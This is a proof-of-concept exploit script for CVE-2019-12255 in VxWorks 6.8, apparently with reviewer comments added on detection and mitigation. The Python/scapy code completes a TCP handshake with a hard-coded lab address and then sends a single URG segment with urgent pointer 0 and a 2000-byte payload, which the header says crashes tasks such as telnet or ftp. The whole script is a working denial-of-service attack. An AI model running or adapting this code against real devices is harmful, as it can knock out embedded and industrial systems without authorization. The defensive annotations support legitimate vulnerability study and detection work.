# Exploit Title: VxWorks TCP Urgent pointer = 0 integer underflow vulnerability
# Discovered By: Armis Security
# PoC Author: Zhou Yu (twitter: @504137480)
# Vendor Homepage: https://www.windriver.com
# Tested on: VxWorks 6.8
# CVE: CVE-2019-12255
# More Details: https://github.com/dazhouzhou/vxworks-poc/tree/master/CVE-2019-12255
# The PoC can crash VxWorks tasks(set the port corresponding to the task in the PoC), such as telnet, ftp, etc.

# Reviewer notes (defensive summary of what the script below does):
# - Flow: complete a TCP three-way handshake with scapy against ip:dport,
#   then send a single segment with PSH, ACK and URG set, urgent pointer 0
#   and a 2000-byte payload.  The header above attributes the resulting
#   task crash to CVE-2019-12255 (a denial of service, not code execution,
#   as far as this page states).
# - Detection: the distinguishing on-the-wire feature is a TCP segment with
#   URG set and urgptr == 0 that carries payload, arriving immediately after
#   a fresh handshake from an ephemeral source port (1024-65535 below).
# - Mitigation: the vendor's fix for CVE-2019-12255; see the CVE and the
#   "More Details" link above.  NOTE(review): fixed versions are not stated
#   on this page -- confirm against the vendor advisory.
# - The script hard-codes a lab address and port and has no argument
#   parsing, timeout handling or error reporting (see notes inline).

from scapy.all import *


if __name__ == "__main__":
    ip = "192.168.10.199"   # target address (hard-coded lab value)
    dport = 23              # listening port of the task under test; 23 is telnet, per the header note
    seq_num = 1000          # initial sequence number for the SYN
    # 2000 bytes of 0x42.  This is a str, not bytes -- presumably scapy
    # encodes it when building the segment; TODO confirm under Python 3.
    payload = "\x42"*2000
    # `random` is not imported explicitly; presumably re-exported by
    # `from scapy.all import *` -- confirm before running standalone.
    sport = random.randint(1024,65535)

    # Step 1: SYN.  sr1() sends the packet and returns the first reply.
    # Crafting packets this way normally needs raw-socket privileges.
    syn = IP(dst = ip)/TCP(sport = sport , dport = dport ,flags = "S", seq=seq_num)
    syn_ack = sr1(syn)

    # Step 2: ACK completing the handshake.
    # NOTE(review): sr1() returns None when nothing answers before its
    # timeout, so `syn_ack.seq` below raises AttributeError instead of
    # reporting a closed or unreachable port.
    seq_num = seq_num + 1
    ack_num = syn_ack.seq+1
    ack = IP(dst = ip)/TCP(sport = sport , dport = dport ,flags = "A", seq=seq_num, ack=ack_num)
    send(ack)

    # Step 3: the trigger segment -- PSH|ACK|URG with urgptr=0 plus the
    # payload.  This is the segment a detection rule would key on.
    psh = IP(dst = ip)/TCP(sport = sport , dport = dport ,flags = "PAU", seq=seq_num, ack=ack_num, urgptr=0) / payload
    send(psh)